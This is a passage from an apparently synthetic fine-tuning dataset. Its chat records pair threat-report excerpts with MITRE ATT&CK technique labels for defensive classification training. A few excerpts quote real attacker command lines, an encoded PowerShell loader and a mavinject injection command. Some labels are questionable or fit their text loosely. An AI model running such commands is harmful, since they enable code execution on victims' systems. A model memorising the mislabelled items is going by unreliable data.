screenshots of the infected system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork has used BITS jobs to download malicious payloads." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "allows adversaries to search for files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini)))); PowerShell one-liner Encoded text file Execution flow: The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In my opinion enumeration is not an attack technique that blue teamers should focus their defense efforts on. The best way to prevent unauthorized users from accessing this information is by having strict conditional access policies which govern how and from where users are allowed to use their Azure AD credentials. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here. I haven’t personally looked into bypassing this or if other functionality in Azure breaks if you enable this" }, { "role": "assistant", "content": "T1078.004 - Valid Accounts: Cloud Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The spreadsheet’s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article" }, { "role": "assistant", "content": "T1112 - Modify Registry', 'T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The server uses folders in the current directory to store information sent and received from WellMess backdoors and the folder layout is shown in Figure 2. Additionally, the server uses a private key and certificate located in the current working directory during mutual TLS connections" }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tarrask creates a scheduled task called “WinUpdate” to re-establish any dropped C2 connections." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tomiris can use HTTP to establish C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument" }, { "role": "assistant", "content": "T1489 - Service Stop', 'T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre has the ability to identify the users on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent has the ability to add bytes to change the file hash." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has accessed and collected credentials from password managers." }, { "role": "assistant", "content": "T1555.005 - Password Managers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has created scheduled tasks using name variants such as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\", to launch Maze at a specific time." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\" /c mavinject.exe 568 /injectrunning c:\\Drivers\\DriverGFY.db\"" }, { "role": "assistant", "content": "T1218.013 - Mavinject" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can obtain a list of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identifies processes and collects the process ids." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver has the ability to manipulate user tokens on targeted Windows systems." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses RC4 encryption to obfuscate HTTP traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used macros in s as well as executed VBScripts on victim machines." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers." }, { "role": "assistant", "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CoinTicker initially downloads a hidden encoded file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has the ability to run an application (\"CreateProcessW\") or script/file (\"ShellExecuteW\") via API." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can track key presses with a keylogger module." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: Listing files in directory Creating arbitrary processes Writing data received from control servers to files on disk Gathering information for all drives Gathering process times for all processes Sending the contents of a specific file to the control server Wiping and deleting files on disk Setting the current working directory for the implant Sending disk space information to the control server - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1057 - Process Discovery', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBALL, initially discovered in an attack during October 2019, is a simple FTP downloader utility which facilitates the installation of SYSCON, a full-featured Remote Access Trojan (RAT) which leverages FTP for Command and Control (C2). It was found embedded in a malicious Word document sent as a phishing lure to a US government agency and two non-US foreign nationals professionally associated with North Korea." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The use of an initial reconnaissance document allows Inception to profile the target’s computer and potentially customize any subsequent malicious document to exploit known vulnerabilities in unpatched software on the computer" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEXTMATE executes cmd.exe to provide a reverse shell to adversaries." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 server will respond to the HTTP requests to the “bat&m=d” URL with a batch script that update.vbs will save to the “dn” folder and execute. The output of the downloaded batch script is saved to a text file in the “up” folder and uploaded to the C2 server via an HTTP POST request to the following URL" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Psylo has a command to download a file to the system from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can execute through the \"WinExec\" API." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers." }, { "role": "assistant", "content": "T1056.004 - Input Capture: Credential API Hooking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An HTTP malware variant decrypts strings using single-byte XOR keys." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands using cmd.exe." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has attempted to lure victims into opening e-mail attachments to execute malicious code." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To deliver the malware to the victim machines, the Rocke group exploits vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. For example, by exploiting Oracle WebLogic vulnerability CVE-2017-10271 in Linux shown in Figure 1, a compromised Linux victim machine downloads backdoor 0720.bin and opens a shell" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can list files on available disk volumes." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Much like the known actors Miniduke or CommentCrew, it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands" }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT steals files based on an extension list if a USB drive is connected to the system." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Starting from August 2020, Pawn Storm has sent several spear phishing emails with a malicious RAR attachment. Among the earliest samples we received were two almost identical RAR files that contained a file called info.exe" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JSS Loader can download and execute VBScript files." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can load a DLL using ." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "decrypts and extracts a copy of its main DLL payload when executing." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has been known to establish persistence by adding programs to the Run Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie establishes persistence via a .lnk file in the victim’s startup path." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: + + “?supportTeamDrives=true&fields=modifiedTime” The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \\”modifiedTime\\”:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1074 - Data Staged', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each of the Silent Librarian lures ends with a very realistic looking closing signature containing contact information for the target library. This information is collected through open source research conducted by the threat actors. In some cases, all of the contact information can be found together on one webpage; however, some of the information is in different locations, indicating the actors are likely performing manual reconnaissance to gather the information" }, { "role": "assistant", "content": "T1594 - Search Victim-Owned Websites" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used cloud services, including OneDrive, for data exfiltration." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee uses a batch file to load a DLL into the svchost.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar encodes communications to the C2 server in Base64." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used base64 to encode command and control traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OwaAuth has a command to timestop a file or directory." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used AOL Instant Messenger for C2." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as \"Google Defender\" \"Google Email Protection,\" and \"Google Scanner\" for Gmail users. They also targeted Yahoo users with applications masquerading as \"Delivery Service\" and \"McAfee Email Protection\"." }, { "role": "assistant", "content": "T1528 - Steal Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has relied on a user to click a malicious link within a spearphishing email." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Use of custom routines to decrypt strings (Deobfuscate/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses rundll32 to call an exported function." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can obtain information about process integrity levels." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can add or remove applications or ports on the Windows firewall or disable it entirely." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke downloaded a file \"libprocesshider\", which could hide files on the target system." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has used \"dir\" to search for \"programfiles\" and \"appdata\"." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates gathers Kubernetes service account tokens using a variety of techniques." }, { "role": "assistant", "content": "T1528 - Steal Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications" }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has conducted C2 over HTTP and HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA lists the system’s processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used \"sc query\" on a victim to gather information about services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group’s 